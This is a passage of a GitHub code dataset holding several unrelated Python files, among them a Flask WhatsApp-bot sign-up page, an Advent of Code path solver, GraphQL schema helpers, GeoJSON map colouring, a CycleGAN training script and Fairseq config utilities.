boundary[boundary == 0.5] = 0\n    mask = np.copy(mask_b)\n    mask[mask == 0.5] = 1\n    np.save(join(path, \"boundary\"), boundary)\n    np.save(join(path, \"mask_boundaries\"), mask_b)\n    np.save(join(path, \"mask\"), mask)\n\n\ndef generate_train_val_files(percent=0.2):\n    directory = training_path\n    train_path = 'training.txt'\n    val_path = 'validation.txt'\n    image_folders = listdir(directory)\n\n    train_file = open(train_path, \"w\")\n    val_file = open(val_path, \"w\")\n\n    for image in image_folders:\n        path = directory + \"/\" + image + \"\\n\"\n        if random.random() < percent:\n            val_file.write(path)\n        else:\n            train_file.write(path)\n\n    train_file.close()\n    val_file.close()\n\n\ndef collapse_test():\n    directory = training_path\n    new_dir = 'all_test'\n    if not exists(new_dir):\n        makedirs(new_dir)\n    name_list = listdir(directory)\n    for name in name_list:\n        src = join(join(directory, name), join('images', name + '.png'))\n        dst = join(new_dir, name + '.png')\n        copyfile(src, dst)\n\n\ndef word_to_hot_enc(word):\n    labels = [\"boundary\", \"background\", \"interior\"]\n    n = len(labels)\n    hot = np.zeros(n)\n    if word in labels:\n        ind = labels.index(word)\n        hot[ind] = 1\n    else:\n        hot = []\n    return hot\n\n\ndef get_file_paths(directory):\n    files = [directory + '/' + f for f in listdir(directory) if isfile(join(directory, f))]\n    return files\n\n\ndef get_file_names(directory):\n    files = [f for f in listdir(directory) if isfile(join(directory, f))]\n    return files\n","repo_name":"orange-juicers/2018_data_science_bowl","sub_path":"Getting_Started/orange_juicers_utils.py","file_name":"orange_juicers_utils.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74362244006","text":"#!/usr/bin/python\n\nimport os\nfrom utils import get_db\nfrom flask import Flask, render_template, jsonify, request, flash, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom forms import PhoneForm\nfrom itsdangerous import URLSafeTimedSerializer\nimport random\n\n# APP\napp = Flask(__name__)\napp.config.from_object(\"config.DevelopmentConfig\")\nBootstrap(app)\napp.config[\"SECRET_KEY\"] = os.environ[\"SECRET_KEY\"]\nts = URLSafeTimedSerializer(app.config[\"SECRET_KEY\"])\n\n# Static path\nstatic_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"static\"))\n\n# MongoDB\ndb = get_db()\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/privacy')\ndef privacy():\n\treturn render_template('privacy.html')\n\n\n@app.route('/join/<token>', methods=['GET', 'POST'])\n@app.route('/join/<token>/', methods=['GET', 'POST'])\ndef join(token):\n\tform = PhoneForm(request.form)\n\tif request.method == 'POST' and form.validate_on_submit():\n\t\tstudent = db.students.find_one(\n\t\t\t{ 'token': token, 'status': { '$in': [ 1, 2, 3, 4 ] } },\n\t\t\t{ '_id': 1 },\n\t\t)\n\t\tif student:\n\t\t\t# Retrieve phone\n\t\t\tphone = request.form['phone'].strip()\n\t\t\tif phone.startswith('0'):\n\t\t\t\tphone = '+353' + phone[1:]\n\t\t\tif phone.startswith('+'):\n\t\t\t\tphone = phone[1:] + '@c.us'\n\t\t\t# Create code\n\t\t\tcode = ''.join([ str(random.randint(0, 9)) for _ in range(6) ])\n\t\t\tresult = db.students.update_one(\n\t\t\t\t{ 'token': token },\n\t\t\t\t{\n\t\t\t\t\t'$set': { \n\t\t\t\t\t\t'phone': phone,\n\t\t\t\t\t\t'code': code,\n\t\t\t\t\t\t'status': 2, # Status: \"Code Shown\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t)\n\t\t\tif result.matched_count == 1:\n\t\t\t\t# Show Code\n\t\t\t\treturn 
redirect(url_for('success', code=code))\n\t\t# Student not found or update could not be made\n\t\treturn redirect(url_for('fail'))\n\treturn render_template('join.html', token=token, form=form)\n\n\n@app.route('/success')\ndef success():\n\tcode = request.args['code']\n\tflash(dict(\n\t\talert_type = 'alert-info',\n\t\ttext = 'CoderBot will talk to you now on WhatsApp, insert the following code to verify it is you: ',\n\t\ttext_bold = code,\n\t\t)\n\t)\n\treturn render_template('base.html')\n\n\n@app.route('/fail')\ndef fail():\n\tflash(dict(\n\t\talert_type = 'alert-danger',\n\t\ttext = 'There was an issue with your request, please email our admin at ',\n\t\ttext_bold = 'predictcs@computing.dcu.ie',\n\t\t)\n\t)\n\treturn render_template('base.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80)","repo_name":"dazcona/code-assistant","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8023910861","text":"#!/usr/bin/env python3\n\nimport copy\nimport sys\n\nfrom graph import *\n\nclass FloorNode(Node):\n def __init__(self, name, value):\n super().__init__(name, value)\n self.risk = sys.maxsize\n\n def visit_neighbors(self):\n to_visit = []\n cost_out = self.risk + self.value\n # print(\"---\")\n # print(self.name, cost_out)\n for edge in self.edges.values():\n node = edge.other_node(self)\n # print(node.name, edge.weight)\n if cost_out < edge.weight:\n edge.weight = cost_out\n to_visit.append(node)\n node.visit(cost_out)\n # print(f'added {node.name}')\n # else:\n # print(f'skipped {node.name}')\n # print(\"---\")\n return to_visit\n\n def visit(self, risk):\n self.risk = min(risk, self.risk)\n\ndef new_grid(old_grid, to_add):\n grid = copy.deepcopy(old_grid)\n for row in range(len(old_grid)):\n for col in range(len(old_grid[row])):\n new_value = (old_grid[row][col] - 1 + to_add) % 9 + 1\n grid[row][col] = new_value\n return grid\n\nif '__main__' == __name__:\n grid = []\n done = False\n\n build_graph = False\n while not done:\n try:\n line = input()\n if 'x5' == line:\n build_graph = True\n continue\n grid.append([int(i) for i in list(line)])\n except:\n done = True\n\n if build_graph:\n grids = {}\n for i in range(9):\n grids[i] = new_grid(grid, i)\n\n # print(grids)\n\n big_grid = []\n for j in range(5):\n for i in range(len(grid[0])):\n big_grid.append(grids[j+0][i] + grids[j+1][i] + grids[j+2][i] + grids[j+3][i] + grids[j+4][i])\n \n # for row in big_grid:\n # for val in row:\n # print(val, end='')\n # print()\n\n grid = big_grid\n\n graph = Graph.from_grid(grid, node_class=FloorNode)\n for edge in graph.edges:\n edge.weight = sys.maxsize\n # print(graph)\n\n # for edge in graph.edges:\n # print(edge)\n\n start_node = graph.node((0,0))\n start_node.risk = 0\n start_node.value = 0\n to_visit = [start_node]\n while to_visit:\n # print([node.name for node in to_visit])\n next_visits = []\n for node in to_visit:\n next_visits += node.visit_neighbors()\n to_visit = list(set(next_visits))\n\n width = len(grid[0])\n height = len(grid)\n # for y in range(height):\n # for x in range(width):\n # print(f'{graph.node((x,y)).risk:02d} ', end='')\n # print()\n\n end_node = graph.node((width-1, height-1))\n print(end_node.risk + 
end_node.value)\n","repo_name":"messerman/advent_of_code_2021","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10350758234","text":"from collections import defaultdict\nfrom itertools import chain\nfrom typing import Iterator, List, Union\n\nfrom graphql import GraphQLSchema\n\nfrom .build_schema import build_schema_from_type_definitions\nfrom .resolvers import add_resolve_functions_to_schema\n\n\ndef decompose_maps(resolvers_maps: List[dict]) -> Iterator[tuple]:\n def flatten(rm):\n for key, value in rm.items():\n for resolver_name, resolver in value.items():\n yield (key, resolver_name, resolver)\n\n return chain.from_iterable(flatten(m) for m in resolvers_maps)\n\n\ndef merge_resolvers(resolver_list: Iterator[tuple]) -> dict:\n output = defaultdict(dict) # type: dict\n for key, resolver_name, resolver in resolver_list:\n output[key][resolver_name] = resolver\n return output\n\n\ndef join_type_defs(type_defs: List[str]) -> str:\n return \"\\n\\n\".join(t.strip() for t in type_defs)\n\n\ndef make_executable_schema(\n type_defs: Union[str, List[str]], resolvers: Union[dict, List[dict]]\n) -> GraphQLSchema:\n if isinstance(type_defs, list):\n type_defs = join_type_defs(type_defs)\n\n schema = build_schema_from_type_definitions(type_defs)\n\n if isinstance(resolvers, list):\n add_resolve_functions_to_schema(\n schema, merge_resolvers(decompose_maps(resolvers))\n )\n elif isinstance(resolvers, dict):\n add_resolve_functions_to_schema(schema, resolvers)\n\n return schema\n","repo_name":"IvanVrecicDev/Python","sub_path":"ariadne-master/ariadne/executable_schema.py","file_name":"executable_schema.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75389968808","text":"import geojson\nimport json\nimport csv\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\nimport copy as cp\n\nSTATISTICS_FOLDER = \"statistics/\"\nGEOJSON_FOLDER = \"geojson/\"\n\nSTATISTICS_FILE_LOCATION = STATISTICS_FOLDER+\"modelled_nuts1_gva_values.csv\"\nNUTS_REGIONS_FILE = GEOJSON_FOLDER+\"NUTS1_EU.geojson\"\nOUTPUT_NUTS_REGIONS_WITH_STATS = GEOJSON_FOLDER+'MODELLED_NUTS1_EU_GVA.geojson'\n\nSTATISTIC_NAME = 'GVA in Thousands'\nMATPLOTLIB_COLOUR_MAP_TYPE = 'inferno'\n\n\ndef read_csv(file_location):\n statistical_values = {}\n with open(file_location) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n statistical_values[row[0]]=row[1]\n return statistical_values\n\n\ndef normalise_values(values):\n max_value = max([int(i) for i in values.values()])\n min_value = min([int(i) for i in values.values()])\n for value in values:\n values[value]= (int(values[value]) - min_value)/(max_value - min_value)\n return values\n\n\ndef gather_statistic(statistic_values, geojson):\n nuts_code = geojson.properties[\"NUTS_ID\"]\n return statistic_values.get(nuts_code, 0) # retrieve gva value, sensible default of 0 if not found\n\n\n# OPEN GEOJSON FILE OF NUT3 REGIONS\nwith open(NUTS_REGIONS_FILE) as json_file:\n geo_json_data = geojson.load(json_file)\n\n# READ IN CSV OF STATISTICS FOR NUT3 REGIONS\nunnormalised_values = read_csv(STATISTICS_FILE_LOCATION)\nnormalised_values = normalise_values(cp.copy(unnormalised_values))\n\n#COLOUR MAPPER\nnormalised_max =1\nnormalised_min = 0\nnorm = colors.Normalize(vmin=normalised_min, 
vmax=normalised_max)\nrgb_colour_mapper = cm.ScalarMappable(norm=norm, cmap=cm.get_cmap(MATPLOTLIB_COLOUR_MAP_TYPE))\n\ndef generate_hex_colour(colour_mapper, value):\n rgb = colour_mapper.to_rgba(value)[:3]\n return '#%02x%02x%02x' % tuple([int(255*colour) for colour in rgb])\n\n# update colour based off statistic and append statistic as property\nfor feature in geo_json_data.features:\n normalised_value = gather_statistic(normalised_values, feature)\n unnormalised_value = gather_statistic(unnormalised_values, feature)\n feature.properties[\"fill\"] = generate_hex_colour(rgb_colour_mapper, normalised_value)\n feature.properties[STATISTIC_NAME] = unnormalised_value\n\n# SAVE FILE TO OUTPUT FILE\nwith open(OUTPUT_NUTS_REGIONS_WITH_STATS, 'w') as output_json_file:\n json.dump(geo_json_data, output_json_file)\n","repo_name":"jwgwalton/geo_json_mapping","sub_path":"generate_statistic_augmented_geojson.py","file_name":"generate_statistic_augmented_geojson.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29004546986","text":"import numpy as np\nfrom utils import gen, chunker, WINDOW_SIZE, rescale_array\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom sklearn.metrics import f1_score, accuracy_score, classification_report\nfrom glob import glob\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nimport sys\n\nif (len(sys.argv) != 4):\n print(\"error\")\n exit(1)\n\nbase_path = os.path.join(sys.argv[1], sys.argv[2])\nprint(\"BASE PATH\", base_path)\n\nfiles = sorted(glob(os.path.join(base_path, \"*.npz\")))\n\nid = sys.argv[3]\nlist_f1 = []\nlist_acc = []\npreds = []\ngt = []\n\nlabels = ['Wake', 'N1', 'N2', 'N3', 'REM']\n\ntest_ids = {id}\n\ntest = [x for x in files if x.split(\"/\")[-1][:5] in test_ids]\n\nx_test = []\ny_test = []\n\nfor file in test:\n temp = np.load(file)\n x_test.append(np.array(temp[\"x\"]))\n y_test.append(temp[\"y\"])\n\nx_test = np.vstack(x_test)\ny_test = np.hstack(y_test)\nx_test = np.array(x_test).reshape(-1, 3000, 1)\ny_test = np.array(y_test)\n\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nfrom keras.utils import np_utils\n\nlabel_encoder = LabelEncoder()\nclasses = list(label_encoder.classes_)\n\nlabel_encoder = LabelEncoder()\ny_test = label_encoder.fit_transform(y_test)\nclasses = list(label_encoder.classes_)\ny_test = np_utils.to_categorical(y_test, num_classes=len(labels))\n\nfile_path = \"models/cnn_crf_model_\" + ch + \"_fold\" + str(id) + \".ckpt\"\nmodel.load_weights(file_path)\n\nfor record in tqdm(x_test):\n all_rows = x_test[record]\n record_y_gt = []\n record_y_pred = []\n for batch_hyp in chunker(range(all_rows.shape[0])):\n\n\n X = all_rows[min(batch_hyp):max(batch_hyp)+1, ...]\n Y = y_test[record][min(batch_hyp):max(batch_hyp)+1]\n\n X = np.expand_dims(X, 0)\n\n X = rescale_array(X)\n\n Y_pred = model.predict(X)\n Y_pred = Y_pred.argmax(axis=-1).ravel().tolist()\n\n gt += Y.ravel().tolist()\n preds += Y_pred\n\n record_y_gt += Y.ravel().tolist()\n record_y_pred += Y_pred\n\n\nf1 = f1_score(gt, preds, average=\"macro\")\n\nacc = accuracy_score(gt, preds)\n\nprint(\"acc %s, f1 %s\"%(acc, 
f1))","repo_name":"soundarya98/Fascia_nucleus","sub_path":"Fascia_modelZoo/SpeechModels/modelTest.py","file_name":"modelTest.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70246141289","text":"import os\nimport shutil\n\n\ndef copy_unique_images(source_folder, destination_folder):\n \"\"\"\n Sample one image for each of the subjects and discard other similar frames.\n Each subject is identified by the first part of the image name.\n Save the results to the destination folder.\n\n \"\"\"\n image_groups = {}\n\n # Iterate through all images in the source folder\n for filename in os.listdir(source_folder):\n filepath = os.path.join(source_folder, filename)\n\n # Check if it is a images\n if os.path.isfile(filepath):\n # Get the first part of the image name\n group_name = filename.split('_')[0]\n\n # Add the image to the corresponding group\n if group_name in image_groups:\n image_groups[group_name].append(filepath)\n else:\n image_groups[group_name] = [filepath]\n\n # Iterate through each image group and select one image to copy to the target folder\n for group_images in image_groups.values():\n if group_images:\n selected_image = group_images[0]\n shutil.copy(selected_image, destination_folder)\n\n\ndef process_folder(input_folder, output_folder):\n \"\"\"\n given one dataset folder which contains several sub_folders for different categories,\n return one dataset with its sub_folders modified by some methods (in this case,copy_unique_images())\n :param input_folder: the path of the original dataset\n :param output_folder: the output path of the modified dataset\n \"\"\"\n subfolders = [f for f in os.listdir(input_folder) if os.path.isdir(os.path.join(input_folder, f))]\n for subfolder in subfolders:\n input_path = os.path.join(input_folder, subfolder)\n output_path = os.path.join(output_folder, subfolder)\n # Create output folder, if it does not exist\n os.makedirs(output_path, exist_ok=True)\n # for each sub-folder, apply copy_unique_images()\n copy_unique_images(input_path, output_path)\n\n print(\"complete!\")\n\n\n# remove the similar frames in the CK+ dataset.\nsource_folder = '../datasets/CK+_raw'\ndestination_folder = '../datasets/CK+'\nprocess_folder(source_folder, destination_folder)\n","repo_name":"hasan-rakibul/MaskTheFER","sub_path":"src/remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42234408187","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef main():\r\n pagina = requests.get(\"https://pt.wikipedia.org/wiki/Wikipédia:Página_principal\")\r\n\r\n if pagina.status_code == 200:\r\n conteudo = pagina.content\r\n soup = BeautifulSoup(conteudo, \"html.parser\")\r\n links = soup.find_all(\"a\")\r\n\r\n for i in links:\r\n print(i.get(\"href\"))\r\n\r\n else:\r\n print(\"A solicitação falhou!\")\r\n\r\n\r\nmain()","repo_name":"layusso/Programa-o-para-Internet-I","sub_path":"Atividade Request/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18139026399","text":"#!/usr/bin/env python\n# pylint: disable=missing-docstring\n# -*- coding: utf-8 -*-\n\n\"\"\"Trains, evaluates and saves the model network using a queue.\"\"\"\nfrom __future__ import absolute_import\nfrom 
__future__ import division\nfrom __future__ import print_function\n\nimport imp\nimport json\nimport logging\nimport numpy as np\nimport os.path\nimport sys\n\nimport scipy as scp\nimport scipy.misc\n\n\nsys.path.insert(1, '../../incl')\n\nimport tensorflow as tf\n\nimport tensorvision.utils as utils\nimport tensorvision.core as core\nimport tensorvision.analyze as ana\n\nfrom seg_utils import seg_utils as seg\n\n# configure logging\nif 'TV_IS_DEV' in os.environ and os.environ['TV_IS_DEV']:\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\nelse:\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\ntest_file = 'data_road/testing.txt'\n\n\ndef create_test_output(hypes, sess, image_pl, softmax):\n data_dir = hypes['dirs']['data_dir']\n data_file = os.path.join(data_dir, test_file)\n image_dir = os.path.dirname(data_file)\n\n logdir = \"test_images/\"\n logdir_rb = \"test_images_rb/\"\n logdir_green = \"test_images_green/\"\n\n logging.info(\"Images will be written to {}/test_images_{{green, rg}}\"\n .format(logdir))\n\n logdir = os.path.join(hypes['dirs']['output_dir'], logdir)\n logdir_rb = os.path.join(hypes['dirs']['output_dir'], logdir_rb)\n logdir_green = os.path.join(hypes['dirs']['output_dir'], logdir_green)\n\n if not os.path.exists(logdir):\n os.mkdir(logdir)\n\n if not os.path.exists(logdir_rb):\n os.mkdir(logdir_rb)\n\n if not os.path.exists(logdir_green):\n os.mkdir(logdir_green)\n\n image_list = []\n\n with open(data_file) as file:\n for i, image_file in enumerate(file):\n image_file = image_file.rstrip()\n image_file = os.path.join(image_dir, image_file)\n image = scp.misc.imread(image_file)\n shape = image.shape\n\n feed_dict = {image_pl: image}\n\n output = sess.run([softmax['softmax']], feed_dict=feed_dict)\n output_im = output[0][:, 1].reshape(shape[0], shape[1])\n\n ov_image = seg.make_overlay(image, output_im)\n hard = output_im > 0.5\n green_image = utils.fast_overlay(image, hard)\n\n name = os.path.basename(image_file)\n new_name = name.split('_')[0] + \"_road_\" + name.split('_')[1]\n\n save_file = os.path.join(logdir, new_name)\n logging.info(\"Writing file: %s\", save_file)\n scp.misc.imsave(save_file, output_im)\n save_file = os.path.join(logdir_rb, new_name)\n scp.misc.imsave(save_file, ov_image)\n save_file = os.path.join(logdir_green, new_name)\n scp.misc.imsave(save_file, green_image)\n\n\ndef _create_input_placeholder():\n image_pl = tf.placeholder(tf.float32)\n label_pl = tf.placeholder(tf.float32)\n return image_pl, label_pl\n\n\ndef do_inference(logdir):\n \"\"\"\n Analyze a trained model.\n\n This will load model files and weights found in logdir and run a basic\n analysis.\n\n Parameters\n ----------\n logdir : string\n Directory with logs.\n \"\"\"\n hypes = utils.load_hypes_from_logdir(logdir)\n modules = utils.load_modules_from_logdir(logdir)\n\n # Tell TensorFlow that the model will be built into the default Graph.\n with tf.Graph().as_default():\n\n # prepaire the tv session\n\n with tf.name_scope('Validation'):\n image_pl, label_pl = _create_input_placeholder()\n image = tf.expand_dims(image_pl, 0)\n softmax = core.build_inference_graph(hypes, modules,\n image=image)\n\n sess = tf.Session()\n saver = tf.train.Saver()\n\n core.load_weights(logdir, sess, saver)\n\n create_test_output(hypes, sess, image_pl, softmax)\n return\n\n\ndef main(_):\n \"\"\"Run main function.\"\"\"\n if 
FLAGS.logdir is None:\n logging.error(\"No logdir are given.\")\n logging.error(\"Usage: tv-analyze --logdir dir\")\n exit(1)\n\n if FLAGS.gpus is None:\n if 'TV_USE_GPUS' in os.environ:\n if os.environ['TV_USE_GPUS'] == 'force':\n logging.error('Please specify a GPU.')\n logging.error('Usage tv-train --gpus ')\n exit(1)\n else:\n gpus = os.environ['TV_USE_GPUS']\n logging.info(\"GPUs are set to: %s\", gpus)\n os.environ['CUDA_VISIBLE_DEVICES'] = gpus\n else:\n logging.info(\"GPUs are set to: %s\", FLAGS.gpus)\n os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpus\n\n utils.load_plugins()\n\n logdir = os.path.realpath(FLAGS.logdir)\n\n logging.info(\"Starting to analyze Model in: %s\", logdir)\n do_inference(logdir)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"MarvinTeichmann/KittiSeg","sub_path":"submodules/evaluation/kitti_test.py","file_name":"kitti_test.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":904,"dataset":"github-code","pt":"53"} +{"seq_id":"4062899269","text":"import torch\r\nimport torchvision.transforms as transforms\r\n\r\nimport itertools\r\nfrom pathlib import Path\r\nimport torch.nn as nn\r\n\r\nfrom Girl2animeDataset import Girl2animeDataset\r\nfrom models import Generator,Discriminator,weights_init\r\n\r\nimport torch.backends.cudnn as cudnn\r\ncudnn.benchmark = True\r\n\r\nfrom train import fit\r\n\r\nimport os\r\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\r\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n\r\nroot = 'girl2anime'\r\nnum_workers = 6\r\nbatch_size = 5\r\nepochs = 100\r\nlr = 2*1e-4\r\n\r\ntransform = transforms.Compose([\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n\r\n\r\ndataset = Girl2animeDataset(root,transform, mode=\"train\")\r\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,num_workers =num_workers , shuffle=True, pin_memory=True)\r\n\r\nmodel = {\r\n \"G_AB\": Generator().to(device),\r\n \"D_A\": Discriminator().to(device),\r\n \"F_BA\": Generator().to(device),\r\n \"D_B\": Discriminator().to(device),\r\n}\r\n\r\nmodel[\"G_AB\"].apply(weights_init)\r\nmodel[\"D_A\"].apply(weights_init)\r\nmodel[\"F_BA\"].apply(weights_init)\r\nmodel[\"D_B\"].apply(weights_init)\r\n\r\n\r\noptim_G_AB_and_F_BA = torch.optim.Adam(itertools.chain(model[\"G_AB\"].parameters(), model[\"F_BA\"].parameters()), lr=lr, betas=(0.5, 0.999))\r\noptim_D_A_and_D_B = torch.optim.Adam(itertools.chain(model[\"D_A\"].parameters(), model[\"D_B\"].parameters()), lr=lr, betas=(0.5, 0.999))\r\n\r\noptimizer = {\r\n \"G_AB_and_F_BA\": optim_G_AB_and_F_BA,\r\n \"D_A_and_D_B\": optim_D_A_and_D_B\r\n }\r\n\r\n# \"We keep the same learning rate for the first 100\r\n# epochs and linearly decay the rate to zero over the next 100\r\n# epochs.\"\r\ndef get_lr(epoch):\r\n start_decay_epoch = epochs // 2\r\n if epoch <= start_decay_epoch:\r\n return 1.0\r\n else:\r\n new_lr = (1 - (epoch - start_decay_epoch) / (start_decay_epoch))\r\n return new_lr\r\n\r\nlr_scheduler_G_AB_and_F_BA = torch.optim.lr_scheduler.LambdaLR(optimizer[\"G_AB_and_F_BA\"], lr_lambda=get_lr)\r\nlr_scheduler_D_A_and_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer[\"D_A_and_D_B\"], lr_lambda=get_lr)\r\n\r\nscheduler = {\r\n \"G_AB_and_F_BA\": lr_scheduler_G_AB_and_F_BA,\r\n \"D_A_and_D_B\": lr_scheduler_D_A_and_D_B\r\n}\r\n\r\ncriterion = {\r\n \"MSE\": nn.MSELoss(),\r\n \"L1\": 
nn.L1Loss()\r\n}\r\n\r\nresults_path = Path(\"results\")\r\nplots_path = Path(\"plots\")\r\nweights_path = Path(\"weights\")\r\nresults_path.mkdir(parents=True, exist_ok=True)\r\nplots_path.mkdir(parents=True, exist_ok=True)\r\nweights_path.mkdir(parents=True, exist_ok=True)\r\n\r\nhistory = fit(model,optimizer,scheduler,criterion,dataloader,epochs,show_mode=False)","repo_name":"dimaavd/cyclegan-girl2anime-project","sub_path":"start_training.py","file_name":"start_training.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41898295342","text":"from django.db import models\r\nfrom services.models import Services_servicepage\r\n\r\nclass Image_portfolio_homepage(models.Model):\r\n title = models.CharField(max_length=255)\r\n description = models.TextField()\r\n image = models.ImageField(upload_to='images_portfolio_homepage/')\r\n\r\nclass Client_comment(models.Model):\r\n name = models.CharField(max_length=40, default='Client Name')\r\n comment = models.TextField(default='Client Comment')\r\n logo = models.ImageField(upload_to='client_comment/')\r\n date = models.DateTimeField(auto_now_add=True)\r\n\r\nclass Services_myapp(models.Model):\r\n services = models.ForeignKey(Services_servicepage, on_delete=models.CASCADE) \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"destinydevelopers/site","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33352619948","text":"edad=float(input(\"Ingresa tu edad: \"))\n\nif edad>=18:\n print(\"Felicidades eres mayor de edad\")\nelse:\n print(\"Lo lamento eres menor de edad\")\n \nnombre1=input(\"Ingresa el nombre de la primer persona: \")\nedad1=float(input(\"Ingresa la edad de la primer persona: \"))\nnombre2=input(\"Ingresa el nombrede la segunda persona: \")\nedad2=float(input(\"Ingresa la edad de la sgunda persona: \"))\n\nif edad1>edad2:\n print(nombre1,\"es mayor que\",nombre2,\"con\",edad1,\"años de edad\")\nelif edad2>edad1:\n print(nombre2,\"es mayor que\",nombre1,\"con\",edad2,\"años de edad\")\nelse:\n print(nombre1,\"y\",nombre2,\"tienen la misma edad con\",edad1,\"años\")","repo_name":"LuisAguilar3456/Python-Data-Rebels-Course","sub_path":"Actividad 19.py","file_name":"Actividad 19.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180175062","text":"#!/usr/bin/python\n\"\"\"\n@authors: Iñigo Urteaga and Moulay-Zaidane Draidia\n\"\"\"\n\n# Imports: python modules\nimport sys, os, re, time\nimport argparse\n\n# Load Fairseq config from file to string\ndef load_fairseq_config_string(config_filepath):\n config_data=None\n # Try opening the config file\n with open('{}'.format(config_filepath), 'r') as config:\n config_data=config.read()\n # Remove double newlines\n config_data=re.sub('\\n\\n','\\n', config_data)\n # Ignore commented lines\n config_data=re.sub('#.*\\n','', config_data)\n # Put all together with spaces\n config_data=re.sub('\\n',' ', config_data)\n \n # Return content\n return config_data\n\n# Update Fairseq config string with new parameter values\ndef update_fairseq_config_string(config_string, params_to_update):\n # Update parameter values\n for param_to_update,param_value in params_to_update.items():\n config_string=re.sub('--{} (.*?) 
'.format(param_to_update), '--{} {} '.format(param_to_update,param_value), config_string)\n \n # Return modified config string\n return config_string\n\ndef update_fairseq_config_file(config_filepath, params_to_update):\n # Try opening the config file\n with open('{}'.format(config_filepath), 'r+') as config:\n # Read old config\n new_config_data=config.read()\n # Update parameter values\n for param_to_update,param_value in params_to_update.items():\n new_config_data=re.sub('--{} (.*?)\\\\n'.format(param_to_update), '--{} {}\\\\n'.format(param_to_update,param_value), new_config_data)\n \n # Write to file and close\n config.seek(0)\n config.write(new_config_data)\n config.truncate()\n config.close()\n\ndef main(config_filepath, save_dir, restore_file):\n # Call function\n config_data=load_fairseq_config_string(config_filepath)\n\n # Replace save_dir, if given\n if save_dir is not None:\n # Replace save dir\n config_data=re.sub('--save-dir (.*?) ', '--save-dir {} '.format(save_dir), config_data)\n\n # Replace restore_file, if given\n if restore_file is not None:\n # Replace save dir\n config_data=re.sub('--restore-file (.*?) ', '--restore-file {} '.format(restore_file), config_data)\n\n # Print content, to use within shell script\n print(config_data)\n\n######################################### \n# Main program is not executed when the module is imported\nif __name__ == '__main__': \n parser = argparse.ArgumentParser(\n description='Script to load Fairseq config from file to string'\n )\n parser.add_argument(\n '-fairseq_config_filepath',\n type=str,\n default='./fairseq_config/pretrain_params_string',\n help='Filepath to Fairseq config file'\n )\n parser.add_argument(\n '-save_dir',\n type=str,\n default='./nlp_bandit_experiments',\n help='Directory for output content'\n )\n \n parser.add_argument(\n '-restore_file',\n type=str,\n default='None',\n help='Path to model checkpoint to restore training from'\n )\n \n # Get arguments from script\n args = parser.parse_args()\n \n # Call main\n main(\n args.fairseq_config_filepath,\n args.save_dir,\n args.restore_file\n )\n","repo_name":"iurteaga/gp_ts_nlp","sub_path":"nlp_bandit_scripts/fairseq_config_utils.py","file_name":"fairseq_config_utils.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25764221407","text":"\"\"\"\nThis file contains all the important functions needed for loading model and dataset\n\"\"\"\nfrom typing import Union, Tuple, Any\n\nimport numpy as np\nimport torch\nimport torchmetrics\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom 